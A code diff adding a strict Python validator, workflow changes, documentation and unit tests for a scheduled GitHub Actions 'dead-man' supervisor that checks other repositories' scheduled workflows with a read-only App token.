+    "actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a",
+)
+EXPECTED_EXPRESSIONS = (
+    "github.event.repository.default_branch",
+    "github.run_attempt",
+    "github.run_id",
+    "github.sha",
+    "github.token",
+    "secrets.QILLQAQ_PRIVATE_KEY",
+    "steps.reader.outputs.token",
+    "vars.QILLQAQ_CLIENT_ID",
+)
+
+
+class WorkflowContractError(RuntimeError):
+    """Raised when the scheduled workflow widens or obscures its authority."""
+
+
+def require(condition: bool, message: str) -> None:
+    if not condition:
+        raise WorkflowContractError(message)
+
+
+def top_level_block(lines: list[str], name: str) -> list[str]:
+    header = f"{name}:"
+    indices = [index for index, line in enumerate(lines) if line == header]
+    require(len(indices) == 1, f"{name} must have one exact top-level mapping")
+    block: list[str] = []
+    for line in lines[indices[0] + 1 :]:
+        if line and not line.startswith(" "):
+            break
+        block.append(line)
+    return block
+
+
+def scalar_mapping(lines: list[str], name: str) -> dict[str, str]:
+    result: dict[str, str] = {}
+    for line in top_level_block(lines, name):
+        if not line or line.lstrip().startswith("#"):
+            continue
+        match = SCALAR.fullmatch(line)
+        require(match is not None, f"{name} contains a nested or malformed entry")
+        key, value = match.groups()
+        require(key not in result, f"{name} contains a duplicate key")
+        result[key] = value
+    return result
+
+
+def first_level_mapping_keys(lines: list[str], name: str) -> list[str]:
+    keys: list[str] = []
+    for line in top_level_block(lines, name):
+        if not line or line.lstrip().startswith("#") or line.startswith("    "):
+            continue
+        require(
+            line.startswith("  ") and line.endswith(":"), f"{name} entry is malformed"
+        )
+        key = line[2:-1]
+        require(bool(re.fullmatch(r"[a-z][a-z0-9_-]*", key)), f"{name} key is invalid")
+        require(key not in keys, f"{name} contains a duplicate key")
+        keys.append(key)
+    return keys
+
+
+def named_step_block(lines: list[str], name: str) -> list[str]:
+    marker = f"      - name: {name}"
+    indices = [index for index, line in enumerate(lines) if line == marker]
+    require(len(indices) == 1, f"step {name!r} must exist exactly once")
+    block = [marker]
+    for line in lines[indices[0] + 1 :]:
+        if line.startswith("      - ") or (line and not line.startswith(" ")):
+            break
+        block.append(line)
+    return block
+
+
+def workflow_step_names(lines: list[str]) -> tuple[str, ...]:
+    names: list[str] = []
+    for line in lines:
+        if line.startswith("      - "):
+            require(
+                line.startswith("      - name: "),
+                "every workflow step must have one explicit exact name",
+            )
+            names.append(line.removeprefix("      - name: "))
+    require(len(names) == len(set(names)), "workflow step names must be unique")
+    return tuple(names)
+
+
+def workflow_actions(lines: list[str]) -> tuple[str, ...]:
+    actions: list[str] = []
+    for line in lines:
+        if line.lstrip().startswith("uses:"):
+            require(line.startswith("        uses: "), "action use is outside a step")
+            actions.append(line[14:].split(" # ", 1)[0])
+    return tuple(actions)
+
+
+def step_scalar_mapping(block: list[str], name: str) -> dict[str, str]:
+    header = f"        {name}:"
+    indices = [index for index, line in enumerate(block) if line == header]
+    require(len(indices) == 1, f"step mapping {name!r} must exist exactly once")
+    result: dict[str, str] = {}
+    for line in block[indices[0] + 1 :]:
+        if line and len(line) - len(line.lstrip()) <= 8:
+            break
+        if not line or line.lstrip().startswith("#"):
+            continue
+        require(line.startswith("          "), f"step mapping {name!r} is malformed")
+        content = line[10:]
+        require(
+            ": " in content and not content.startswith("#"),
+            f"step mapping {name!r} entry is malformed",
+        )
+        key, value = content.split(": ", 1)
+        require(
+            bool(re.fullmatch(r"[A-Za-z_][A-Za-z0-9_-]*", key)),
+            f"step mapping {name!r} key is invalid",
+        )
+        require(key not in result, f"step mapping {name!r} contains a duplicate key")
+        result[key] = value
+    return result
+
+
+def literal_run_lines(block: list[str]) -> list[str]:
+    indices = [index for index, line in enumerate(block) if line == "        run: |"]
+    require(len(indices) == 1, "authority step must contain one literal run block")
+    script: list[str] = []
+    for line in block[indices[0] + 1 :]:
+        if line and len(line) - len(line.lstrip()) <= 8:
+            break
+        if not line:
+            script.append("")
+            continue
+        require(
+            line.startswith("          "), "authority run block indentation is invalid"
+        )
+        script.append(line[10:])
+    return script
+
+
+def validate_workflow_source(source: str) -> dict[str, object]:
+    require("\r" not in source, "workflow must use canonical LF bytes")
+    workflow_sha256 = hashlib.sha256(source.encode("utf-8")).hexdigest()
+    require(
+        workflow_sha256 == EXPECTED_WORKFLOW_SHA256,
+        "workflow bytes do not match the independently reviewed authority contract",
+    )
+    require(
+        re.search(r"\\(?:u[0-9A-Fa-f]{4}|U[0-9A-Fa-f]{8}|x[0-9A-Fa-f]{2})", source)
+        is None,
+        "workflow must not contain escaped semantic YAML characters",
+    )
+    lines = source.splitlines()
+    advanced_yaml = (
+        re.compile(r"^\s*\?"),
+        re.compile(r"^\s*!"),
+        re.compile(r"^\s*%"),
+        re.compile(r"^\s*(?:---|\.\.\.)\s*$"),
+        re.compile(r"^\s*<<\s*:"),
+        re.compile(r"^\s*[&*]"),
+        re.compile(r":\s*[&*][A-Za-z0-9_-]+(?:\s|$)"),
+    )
+    for line in lines:
+        require(
+            "!!" not in line
+            and not any(pattern.search(line) for pattern in advanced_yaml),
+            "workflow uses unsupported advanced YAML authority syntax",
+        )
+    require(
+        lines.count("name: Estate dead-man supervisor") == 1,
+        "workflow name is not exact",
+    )
+    permission_headers = [
+        line for line in lines if re.match(r"^\s*['\"]?permissions['\"]?\s*:", line)
+    ]
+    require(
+        permission_headers == ["permissions:"],
+        "permissions must exist once at top level with no job override",
+    )
+    permissions = scalar_mapping(lines, "permissions")
+    require(permissions == EXPECTED_PERMISSIONS, "workflow permissions are not exact")
+    events = first_level_mapping_keys(lines, "on")
+    require(events == ["schedule"], "workflow event authority is not schedule-only")
+    require(
+        [line for line in top_level_block(lines, "on") if line]
+        == ["  schedule:", '    - cron: "7,22,37,52 * * * *"'],
+        "workflow schedule is not exact",
+    )
+    require(
+        first_level_mapping_keys(lines, "jobs") == ["supervise"],
+        "workflow must contain only the admitted supervisor job",
+    )
+    require(
+        workflow_step_names(lines) == EXPECTED_STEP_NAMES,
+        "workflow step sequence is not exact",
+    )
+    require(
+        workflow_actions(lines) == EXPECTED_ACTIONS,
+        "workflow action sequence is not exact",
+    )
+    control_flow_keys = [
+        line
+        for line in lines
+        if re.match(r"^\s*['\"]?(?:if|continue-on-error)['\"]?\s*:", line)
+    ]
+    require(
+        control_flow_keys == ["        if: always()", "        if: always()"],
+        "workflow step control flow is not exact",
+    )
+
+    checkout = named_step_block(
+        lines, "Checkout exact scheduled default-branch revision"
+    )
+    uses = [line for line in checkout if line.startswith("        uses: ")]
+    require(len(uses) == 1, "checkout action must exist exactly once")
+    checkout_action = uses[0][14:].split(" # ", 1)[0]
+    require(checkout_action == CHECKOUT_ACTION, "checkout action is not exact")
+    checkout_with = step_scalar_mapping(checkout, "with")
+    require(
+        checkout_with
+        == {
+            "ref": "${{ github.sha }}",
+            "persist-credentials": "false",
+            "fetch-depth": "1",
+        },
+        "checkout inputs are not exact",
+    )
+
+    authority = named_step_block(lines, "Require exact schedule authority")
+    require(
+        [line for line in authority if line.startswith("        shell: ")]
+        == ["        shell: bash"],
+        "authority shell is not exact",
+    )
+    authority_env = step_scalar_mapping(authority, "env")
+    require(
+        authority_env
+        == {"DEFAULT_BRANCH": "${{ github.event.repository.default_branch }}"},
+        "authority environment is not exact",
+    )
+    authority_script = [line for line in literal_run_lines(authority) if line]
+    require(
+        authority_script
+        == [
+            "set -euo pipefail",
+            'test "$GITHUB_REF_NAME" = "$DEFAULT_BRANCH"',
+            'test "$(git rev-parse HEAD)" = "$GITHUB_SHA"',
+            'test "$(git status --porcelain)" = ""',
+        ],
+        "authority checkout proof is not exact",
+    )
+
+    reprove = named_step_block(
+        lines, "Re-prove dead-man contracts before live observation"
+    )
+    require(
+        step_scalar_mapping(reprove, "env") == {"PYTHONDONTWRITEBYTECODE": '"1"'},
+        "runtime contract environment is not exact",
+    )
+    reprove_script = [line for line in literal_run_lines(reprove) if line]
+    require(
+        reprove_script
+        == [
+            "set -euo pipefail",
+            "python -m unittest discover -s tests -p 'test_estate_deadman.py' -v",
+            "python .github/scripts/validate_estate_deadman_workflow.py",
+            "python .github/scripts/estate_deadman.py \\",
+            "  --offline-contract-only \\",
+            '  --output "$RUNNER_TEMP/estate-deadman-contract.json"',
+            "git diff --check",
+            'test "$(git rev-parse HEAD)" = "$GITHUB_SHA"',
+            'test "$(git status --porcelain --untracked-files=all)" = ""',
+            "mkdir -p reports",
+            'cp "$RUNNER_TEMP/estate-deadman-contract.json" reports/estate-deadman-contract.json',
+        ],
+        "runtime contract proof script is not exact",
+    )
+
+    reader = named_step_block(lines, "Mint exact read-only estate observer")
+    require(
+        step_scalar_mapping(reader, "with")
+        == {
+            "client-id": "${{ vars.QILLQAQ_CLIENT_ID }}",
+            "private-key": "${{ secrets.QILLQAQ_PRIVATE_KEY }}",
+            "owner": "szl-holdings",
+            "repositories": '".github,szl-org-health,a11oy"',
+            "permission-actions": "read",
+            "permission-contents": "read",
+        },
+        "estate reader App scope is not exact",
+    )
+
+    supervisor = named_step_block(
+        lines, "Observe and reconcile the critical scheduled control planes"
+    )
+    require(
+        step_scalar_mapping(supervisor, "env")
+        == {
+            "ESTATE_READ_TOKEN": "${{ steps.reader.outputs.token }}",
+            "GITHUB_TOKEN": "${{ github.token }}",
+        },
+        "supervisor token environment is not exact",
+    )
+    supervisor_script = [line for line in literal_run_lines(supervisor) if line]
+    require(
+        supervisor_script
+        == [
+            "set +e",
+            "python .github/scripts/estate_deadman.py \\",
+            "  --output reports/estate-deadman.json",
+            "rc=$?",
+            'echo "exit_code=$rc" >> "$GITHUB_OUTPUT"',
+            "exit 0",
+        ],
+        "supervisor execution script is not exact",
+    )
+
+    final_gate = named_step_block(lines, "Require a confirmed healthy control plane")
+    require(
+        [line for line in literal_run_lines(final_gate) if line]
+        == [
+            "set -euo pipefail",
+            "receipt_sha=\"$(sha256sum reports/estate-deadman.json | cut -d' ' -f1)\"",
+            "expected_sha=\"$(tr -d '\\r\\n' < reports/estate-deadman.json.sha256)\"",
+            'test "$receipt_sha" = "$expected_sha"',
+            "jq -e '.schema == \"szl.estate-deadman-receipt/v1\"' reports/estate-deadman.json >/dev/null",
+            "jq -e '.secret_values_recorded == false' reports/estate-deadman.json >/dev/null",
+            "jq -e '.authority.controller_tip_reverified == true' reports/estate-deadman.json >/dev/null",
+            "jq -e '.authority.workflow_mutation == false and .authority.deployment_mutation == false' reports/estate-deadman.json >/dev/null",
+            "jq -e '.incident.ok == true' reports/estate-deadman.json >/dev/null",
+            "jq -e '.confirmed_healthy == true' reports/estate-deadman.json >/dev/null",
+        ],
+        "terminal health gate script is not exact",
+    )
+
+    expressions = sorted(
+        match.group(1).strip()
+        for match in re.finditer(r"\$\{\{\s*([^}]+?)\s*\}\}", source)
+    )
+    require(
+        tuple(expressions) == EXPECTED_EXPRESSIONS,
+        "workflow expression authority is not exact",
+    )
+
+    required = (
+        "persist-credentials: false",
+        "ref: ${{ github.sha }}",
+        "github.event.repository.default_branch",
+        "cancel-in-progress: false",
+    )
+    for marker in required:
+        require(marker in source, f"missing workflow contract marker: {marker}")
+    forbidden = (
+        "pull_request_target",
+        "contents: write",
+        "actions: write",
+        "deployments: write",
+        "packages: write",
+        "id-token: write",
+        "statuses: write",
+        "pull-requests: write",
+        "continue-on-error",
+        "self-hosted",
+    )
+    for marker in forbidden:
+        require(marker not in source, f"forbidden workflow authority: {marker}")
+    return {
+        "schema": "szl.estate-deadman-workflow-contract/v1",
+        "events": events,
+        "permissions": permissions,
+        "checkout_action": CHECKOUT_ACTION,
+        "workflow_sha256": workflow_sha256,
+        "valid": True,
+    }
+
+
+def main() -> int:
+    source = WORKFLOW_PATH.read_text(encoding="utf-8")
+    print(json.dumps(validate_workflow_source(source), sort_keys=True))
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/.github/scripts/verify_forge9_governance.py
+++ b/.github/scripts/verify_forge9_governance.py
@@ -48,6 +48,12 @@ APP_TOKEN_PERMISSION_CONTRACTS = {
             "permission-organization-administration": "read",
         },
     ),
+    ".github/workflows/estate-deadman.yml": (
+        {
+            "permission-actions": "read",
+            "permission-contents": "read",
+        },
+    ),
     ".github/workflows/organization-control-sweep.yml": (
         {
             "permission-actions": "read",
@@ -285,7 +291,10 @@ def verify_app_token_permissions() -> None:
     for path in workflow_root.iterdir():
         if not path.is_file() or path.suffix.lower() not in {".yml", ".yaml"}:
             continue
-        relative = str(path.relative_to(ROOT))
+        # Keep the governed inventory stable across Linux CI and Windows
+        # operator workstations; contract keys are repository paths, not
+        # host-native filesystem spellings.
+        relative = path.relative_to(ROOT).as_posix()
         blocks = app_token_permission_blocks(relative)
         if blocks:
             discovered[relative] = blocks

--- a/.github/workflows/estate-deadman-contract.yml
+++ b/.github/workflows/estate-deadman-contract.yml
@@ -1,10 +1,13 @@
 name: Estate dead-man contracts
 
 on:
+  merge_group:
+    types: [checks_requested]
   pull_request:
     paths:
       - "governance/estate-deadman.v1.json"
       - ".github/scripts/estate_deadman.py"
+      - ".github/scripts/validate_estate_deadman_workflow.py"
       - "tests/test_estate_deadman.py"
       - ".github/workflows/estate-deadman.yml"
       - ".github/workflows/estate-deadman-contract.yml"
@@ -14,6 +17,7 @@ on:
     paths:
       - "governance/estate-deadman.v1.json"
       - ".github/scripts/estate_deadman.py"
+      - ".github/scripts/validate_estate_deadman_workflow.py"
       - "tests/test_estate_deadman.py"
       - ".github/workflows/estate-deadman.yml"
       - ".github/workflows/estate-deadman-contract.yml"
@@ -52,58 +56,16 @@ jobs:
       - name: Prove policy, state evaluation, and bounded authority
         run: |
           set -euo pipefail
-          python -m py_compile .github/scripts/estate_deadman.py tests/test_estate_deadman.py
+          python -m py_compile .github/scripts/estate_deadman.py .github/scripts/validate_estate_deadman_workflow.py tests/test_estate_deadman.py
           python -m unittest discover -s tests -p 'test_estate_deadman.py' -v
+          python .github/scripts/validate_estate_deadman_workflow.py
           python .github/scripts/estate_deadman.py \
             --offline-contract-only \
             --output reports/estate-deadman-contract.json
           git diff --check
 
       - name: Prove live workflow is provider-scheduled and least privilege
-        run: |
-          python - <<'PY'
-          from pathlib import Path
-
-          source = Path('.github/workflows/estate-deadman.yml').read_text(encoding='utf-8')
-          required = (
-              'name: Estate dead-man supervisor',
-              '  schedule:',
-              'cron: "7,22,37,52 * * * *"',
-              'actions: read',
-              'contents: read',
-              'issues: write',
-              'persist-credentials: false',
-              'ref: ${{ '${{ github.sha }}' }}',
-              'github.event.repository.default_branch',
-              'cancel-in-progress: false',
-          )
-          for marker in required:
-              assert marker in source, marker
-          forbidden = (
-              'pull_request_target',
-              'contents: write',
-              'actions: write',
-              'deployments: write',
-              'packages: write',
-              'secrets.',
-              'self-hosted',
-          )
-          for marker in forbidden:
-              assert marker not in source, marker
-          events = []
-          in_on = False
-          for line in source.splitlines():
-              if line == 'on:':
-                  in_on = True
-                  continue
-              if in_on and line and not line.startswith(' '):
-                  break
-              if in_on and line.startswith('  ') and not line.startswith('    '):
-                  stripped = line.strip()
-                  if stripped.endswith(':'):
-                      events.append(stripped[:-1])
-          assert events == ['schedule'], events
-          PY
+        run: python .github/scripts/validate_estate_deadman_workflow.py
 
       - name: Upload immutable contract receipt
         uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7.0.1

--- a/.github/workflows/estate-deadman.yml
+++ b/.github/workflows/estate-deadman.yml
@@ -47,18 +47,36 @@ jobs:
           python-version: "3.12"
 
       - name: Re-prove dead-man contracts before live observation
+        env:
+          PYTHONDONTWRITEBYTECODE: "1"
         run: |
           set -euo pipefail
-          python -m py_compile .github/scripts/estate_deadman.py tests/test_estate_deadman.py
           python -m unittest discover -s tests -p 'test_estate_deadman.py' -v
+          python .github/scripts/validate_estate_deadman_workflow.py
           python .github/scripts/estate_deadman.py \
             --offline-contract-only \
-            --output reports/estate-deadman-contract.json
+            --output "$RUNNER_TEMP/estate-deadman-contract.json"
           git diff --check
+          test "$(git rev-parse HEAD)" = "$GITHUB_SHA"
+          test "$(git status --porcelain --untracked-files=all)" = ""
+          mkdir -p reports
+          cp "$RUNNER_TEMP/estate-deadman-contract.json" reports/estate-deadman-contract.json
+
+      - name: Mint exact read-only estate observer
+        id: reader
+        uses: actions/create-github-app-token@bcd2ba49218906704ab6c1aa796996da409d3eb1 # v3.2.0
+        with:
+          client-id: ${{ vars.QILLQAQ_CLIENT_ID }}
+          private-key: ${{ secrets.QILLQAQ_PRIVATE_KEY }}
+          owner: szl-holdings
+          repositories: ".github,szl-org-health,a11oy"
+          permission-actions: read
+          permission-contents: read
 
       - name: Observe and reconcile the critical scheduled control planes
         id: supervisor
         env:
+          ESTATE_READ_TOKEN: ${{ steps.reader.outputs.token }}
           GITHUB_TOKEN: ${{ github.token }}
         shell: bash
         run: |
@@ -94,9 +112,13 @@ jobs:
               stream.write(
                   f"- Incident action: `{(report.get('incident') or {}).get('action', 'UNAVAILABLE')}`\n"
               )
-              stream.write(
-                  f"- Receipt SHA-256: `{report.get('receipt_sha256', 'UNAVAILABLE')}`\n\n"
+              digest_path = Path('reports/estate-deadman.json.sha256')
+              digest = (
+                  digest_path.read_text(encoding='ascii').strip()
+                  if digest_path.exists()
+                  else 'UNAVAILABLE'
               )
+              stream.write(f"- Receipt file SHA-256: `{digest}`\n\n")
               stream.write('| Target | State | Latest run | Conclusion | Success age |\n')
               stream.write('|---|---|---:|---|---:|\n')
               for row in report.get('final_sample', []):
@@ -125,8 +147,12 @@ jobs:
         shell: bash
         run: |
           set -euo pipefail
+          receipt_sha="$(sha256sum reports/estate-deadman.json | cut -d' ' -f1)"
+          expected_sha="$(tr -d '\r\n' < reports/estate-deadman.json.sha256)"
+          test "$receipt_sha" = "$expected_sha"
           jq -e '.schema == "szl.estate-deadman-receipt/v1"' reports/estate-deadman.json >/dev/null
           jq -e '.secret_values_recorded == false' reports/estate-deadman.json >/dev/null
+          jq -e '.authority.controller_tip_reverified == true' reports/estate-deadman.json >/dev/null
           jq -e '.authority.workflow_mutation == false and .authority.deployment_mutation == false' reports/estate-deadman.json >/dev/null
           jq -e '.incident.ok == true' reports/estate-deadman.json >/dev/null
           jq -e '.confirmed_healthy == true' reports/estate-deadman.json >/dev/null

--- a/docs/estate-deadman.md
+++ b/docs/estate-deadman.md
@@ -16,21 +16,40 @@ newer red run. Active runs are accepted only inside their bounded duration and
 only when backed by a fresh success or a newly installed workflow's first-run
 grace period.
 
-A suspected failure is sampled twice, sixty seconds apart. Only a confirmed
-failure creates or refreshes the single `[ESTATE-DEADMAN]` incident. Recovered
-evidence closes that incident automatically. Refreshes are throttled to one per
-hour so a provider outage cannot create an issue or notification storm.
+A suspected failure is sampled twice, sixty seconds apart. Only the same target
+failing both samples creates or refreshes the single `[ESTATE-DEADMAN]`
+incident. Alternating or recovered samples are `INCONCLUSIVE`, fail the run,
+and cannot create, refresh, or close an incident. A later wholly healthy cycle
+closes the incident. Every confirmed-failure cycle refreshes the reserved issue;
+there is no marker-controlled throttle that another workflow could replay to
+suppress current evidence. Each accepted marker is structurally consistent
+with an immutable provider-authenticated scheduled workflow attempt. It does
+not claim causal authorship because same-repository workflows using the built-in
+Actions identity can also write issues; every confirmed cycle overwrites the
+reserved issue with current evidence.
 
-Each cycle writes a JSON receipt and SHA-256 digest. The receipt contains public
+Each cycle writes a JSON receipt and a `.sha256` sidecar containing the SHA-256
+of the exact emitted JSON file bytes. The receipt contains public
 workflow identifiers, timestamps, conclusions, bounded age calculations, and
-the incident action. It contains no credential value.
+the incident action. Its `policy_sha256` binds the exact canonical-LF policy
+source bytes, and duplicate JSON object keys are rejected. It contains no
+credential value.
 
 ## Authority boundary
 
-The supervisor can read exact GitHub workflow and run metadata and can manage
-one incident issue. It cannot edit workflow definitions, branches, repository
-contents, deployments, DNS, Hugging Face assets, models, products, or public
-effectors. It accepts no caller-supplied repository, workflow, branch, or URL.
+The supervisor mints the existing QILLQAQ GitHub App into a read-only token
+restricted to `.github`, `szl-org-health`, and `a11oy`; that token can read
+Actions and contents metadata only. The built-in `.github` job token is kept in
+a separate client and can manage one incident issue only. Neither credential
+can edit workflow definitions, branches, repository contents, deployments,
+DNS, Hugging Face assets, models, products, or public effectors. The controller
+accepts no caller-supplied repository, workflow, branch, or URL.
+
+The private cross-repository App installation is an operational prerequisite,
+not a source-level claim. The controller is not operationally proven until a
+real provider-scheduled run reads all three repositories and emits a terminal
+receipt. Missing App authority fails closed; there is no fallback to a broader
+personal token or to the repository-scoped incident token.
 
 ## Independent failure domains
 

--- a/governance/estate-deadman.v1.json
+++ b/governance/estate-deadman.v1.json
@@ -7,8 +7,7 @@
     "interval_seconds": 60
   },
   "incident": {
-    "title": "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
-    "refresh_minutes": 60
+    "title": "[ESTATE-DEADMAN] Critical scheduled control plane degraded"
   },
   "targets": [
     {

--- a/tests/test_estate_deadman.py
+++ b/tests/test_estate_deadman.py
@@ -2,27 +2,48 @@ from __future__ import annotations
 
 import ast
 import datetime as dt
+import hashlib
+import io
 import sys
+import tempfile
 import unittest
+from contextlib import redirect_stderr
 from importlib.util import module_from_spec, spec_from_file_location
 from pathlib import Path
 from typing import Any, Mapping
+from unittest.mock import patch
 
 ROOT = Path(__file__).resolve().parents[1]
 MODULE_PATH = ROOT / ".github" / "scripts" / "estate_deadman.py"
+WORKFLOW_CONTRACT_PATH = (
+    ROOT / ".github" / "scripts" / "validate_estate_deadman_workflow.py"
+)
 SPEC = spec_from_file_location("estate_deadman", MODULE_PATH)
 assert SPEC and SPEC.loader
 estate_deadman = module_from_spec(SPEC)
 sys.modules[SPEC.name] = estate_deadman
 SPEC.loader.exec_module(estate_deadman)
+WORKFLOW_SPEC = spec_from_file_location(
+    "validate_estate_deadman_workflow", WORKFLOW_CONTRACT_PATH
+)
+assert WORKFLOW_SPEC and WORKFLOW_SPEC.loader
+workflow_contract = module_from_spec(WORKFLOW_SPEC)
+WORKFLOW_SPEC.loader.exec_module(workflow_contract)
 
 ContractError = estate_deadman.ContractError
 GitHubApi = estate_deadman.GitHubApi
+TargetObservation = estate_deadman.TargetObservation
+confirmed_failure_ids = estate_deadman.confirmed_failure_ids
+classify_confirmation = estate_deadman.classify_confirmation
 evaluate_target = estate_deadman.evaluate_target
 issue_body = estate_deadman.issue_body
 load_policy = estate_deadman.load_policy
 offline_contract = estate_deadman.offline_contract
+parse_incident_state = estate_deadman.parse_incident_state
+reconcile_incident = estate_deadman.reconcile_incident
 validate_policy = estate_deadman.validate_policy
+WorkflowContractError = workflow_contract.WorkflowContractError
+validate_workflow_source = workflow_contract.validate_workflow_source
 
 NOW = dt.datetime(2026, 9, 4, 12, 0, tzinfo=dt.timezone.utc)
 
@@ -52,10 +73,65 @@ def policy() -> dict[str, Any]:
         "confirmation": {"samples": 2, "interval_seconds": 60},
         "incident": {
             "title": "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
-            "refresh_minutes": 60,
         },
         "targets": [target()],
     }
+
+
+def report(*, healthy: bool = False, generated_at: str | None = None) -> dict[str, Any]:
+    final_sample = [
+        {
+            "id": "autonomic-public-estate-sre",
+            "healthy": healthy,
+            "state": "HEALTHY" if healthy else "LATEST_RUN_FAILED",
+            "latest_run_id": 123,
+            "latest_conclusion": "success" if healthy else "failure",
+            "success_age_minutes": 7,
+            "reason": "bounded test evidence",
+        }
+    ]
+    return {
+        "schema": "szl.estate-deadman-receipt/v1",
+        "generated_at": generated_at or stamp(0),
+        "controller_repository": "szl-holdings/.github",
+        "controller_branch": "main",
+        "controller_revision": "a" * 40,
+        "controller_run_id": 987654,
+        "controller_run_attempt": 1,
+        "policy_sha256": "b" * 64,
+        "evidence_sha256": "c" * 64,
+        "confirmation_state": "HEALTHY" if healthy else "CONFIRMED_FAILURE",
+        "confirmed_healthy": healthy,
+        "confirmed_failed_target_ids": (
+            [] if healthy else ["autonomic-public-estate-sre"]
+        ),
+        "final_sample": final_sample,
+    }
+
+
+def observation(item_id: str, healthy: bool) -> Any:
+    return TargetObservation(
+        id=item_id,
+        repository=f"szl-holdings/{item_id}",
+        workflow_path=".github/workflows/test.yml",
+        healthy=healthy,
+        state="HEALTHY" if healthy else "LATEST_RUN_FAILED",
+        reason="test",
+        workflow_state="active",
+        workflow_id=1,
+        workflow_revision="a" * 40,
+        workflow_changed_at=stamp(60),
+        latest_run_id=1,
+        latest_status="completed",
+        latest_conclusion="success" if healthy else "failure",
+        latest_created_at=stamp(5),
+        latest_updated_at=stamp(4),
+        latest_html_url="https://github.com/szl-holdings/example/actions/runs/1",
+        last_success_run_id=1 if healthy else None,
+        last_success_updated_at=stamp(4) if healthy else None,
+        success_age_minutes=4 if healthy else None,
+        active_age_minutes=None,
+    )
 
 
 def run(
@@ -72,10 +148,8 @@ def run(
         "conclusion": conclusion,
         "created_at": stamp(created_minutes_ago),
         "run_started_at": stamp(created_minutes_ago),
-        "completed_at": (
-            stamp(completed_minutes_ago)
-            if completed_minutes_ago is not None
-            else None
+        "updated_at": (
+            stamp(completed_minutes_ago) if completed_minutes_ago is not None else None
         ),
         "html_url": f"https://github.com/szl-holdings/example/actions/runs/{run_id}",
     }
@@ -83,11 +157,28 @@ def run(
 
 class PolicyContractTests(unittest.TestCase):
     def test_repository_policy_loads_and_hashes(self) -> None:
-        loaded, digest = load_policy(ROOT / "governance" / "estate-deadman.v1.json")
+        path = ROOT / "governance" / "estate-deadman.v1.json"
+        loaded, digest = load_policy(path)
         self.assertEqual(loaded["schema"], "szl.estate-deadman-policy/v1")
         self.assertEqual(len(loaded["targets"]), 3)
-        self.assertEqual(len(digest), 64)
+        canonical_source = path.read_bytes().replace(b"\r\n", b"\n")
+        self.assertEqual(digest, hashlib.sha256(canonical_source).hexdigest())
         self.assertTrue(all(item["event"] == "schedule" for item in loaded["targets"]))
+
+    def test_policy_rejects_duplicate_json_keys(self) -> None:
+        source = (ROOT / "governance" / "estate-deadman.v1.json").read_text(
+            encoding="utf-8"
+        )
+        ambiguous = source.replace(
+            '  "schema": "szl.estate-deadman-policy/v1",',
+            '  "schema": "attacker-value",\n'
+            '  "schema": "szl.estate-deadman-policy/v1",',
+        )
+        with tempfile.TemporaryDirectory() as directory:
+            path = Path(directory) / "policy.json"
+            path.write_text(ambiguous, encoding="utf-8", newline="\n")
+            with self.assertRaises(ContractError):
+                load_policy(path)
 
     def test_policy_rejects_external_repository(self) -> None:
         raw = policy()
@@ -110,6 +201,14 @@ class PolicyContractTests(unittest.TestCase):
     def test_policy_rejects_single_sample_confirmation(self) -> None:
         raw = policy()
         raw["confirmation"]["samples"] = 1
+        with self.assertRaises(ContractError):
+            validate_policy(raw)
+
+    def test_policy_rejects_three_sample_mode_without_full_sampling_contract(
+        self,
+    ) -> None:
+        raw = policy()
+        raw["confirmation"]["samples"] = 3
         with self.assertRaises(ContractError):
             validate_policy(raw)
 
@@ -149,6 +248,28 @@ class EvaluationTests(unittest.TestCase):
             now=NOW,
         )
 
+    def test_two_sample_failure_must_be_same_target(self) -> None:
+        samples = [
+            [observation("target-a", False), observation("target-b", True)],
+            [observation("target-a", True), observation("target-b", False)],
+        ]
+        self.assertEqual(confirmed_failure_ids(samples, 2), [])
+        self.assertEqual(classify_confirmation(samples, []), "INCONCLUSIVE")
+
+    def test_two_sample_failure_intersection_keeps_only_confirmed_target(self) -> None:
+        samples = [
+            [observation("target-a", False), observation("target-b", True)],
+            [observation("target-a", False), observation("target-b", False)],
+        ]
+        self.assertEqual(confirmed_failure_ids(samples, 2), ["target-a"])
+        self.assertEqual(
+            classify_confirmation(samples, ["target-a"]), "CONFIRMED_FAILURE"
+        )
+
+    def test_all_healthy_sample_is_confirmed_healthy(self) -> None:
+        samples = [[observation("target-a", True), observation("target-b", True)]]
+        self.assertEqual(classify_confirmation(samples, []), "HEALTHY")
+
     def test_recent_success_is_healthy(self) -> None:
         observed = self.observe(
             [
@@ -163,7 +284,39 @@ class EvaluationTests(unittest.TestCase):
         )
         self.assertTrue(observed.healthy)
         self.assertEqual(observed.state, "HEALTHY")
-        self.assertEqual(observed.success_age_minutes, 4)
+        self.assertEqual(observed.success_age_minutes, 5)
+
+    def test_old_rerun_completion_cannot_refresh_schedule_liveness(self) -> None:
+        observed = self.observe(
+            [
+                run(
+                    run_id=10,
+                    status="completed",
+                    conclusion="success",
+                    created_minutes_ago=12 * 60,
+                    completed_minutes_ago=1,
+                )
+            ]
+        )
+        self.assertFalse(observed.healthy)
+        self.assertEqual(observed.state, "STALE_SUCCESS")
+        self.assertEqual(observed.success_age_minutes, 12 * 60)
+
+    def test_future_scheduled_run_timestamp_fails_closed(self) -> None:
+        observed = self.observe(
+            [
+                run(
+                    run_id=10,
+                    status="completed",
+                    conclusion="success",
+                    created_minutes_ago=-5,
+                    completed_minutes_ago=-4,
+                )
+            ]
+        )
+        self.assertFalse(observed.healthy)
+        self.assertEqual(observed.state, "STALE_SUCCESS")
+        self.assertIsNone(observed.success_age_minutes)
 
     def test_stale_success_fails(self) -> None:
         observed = self.observe(
@@ -179,6 +332,25 @@ class EvaluationTests(unittest.TestCase):
         )
         self.assertFalse(observed.healthy)
         self.assertEqual(observed.state, "STALE_SUCCESS")
+
+    def test_malformed_newest_run_cannot_hide_behind_older_green(self) -> None:
+        malformed = run(
+            run_id=11,
+            status="completed",
+            conclusion="failure",
+            created_minutes_ago=1,
+            completed_minutes_ago=0,
+        )
+        malformed["created_at"] = "MALFORMED"
+        older_green = run(
+            run_id=10,
+            status="completed",
+            conclusion="success",
+            created_minutes_ago=5,
+            completed_minutes_ago=4,
+        )
+        with self.assertRaises(ContractError):
+            self.observe([malformed, older_green])
 
     def test_latest_failure_overrides_recent_success(self) -> None:
         observed = self.observe(
@@ -223,6 +395,34 @@ class EvaluationTests(unittest.TestCase):
         )
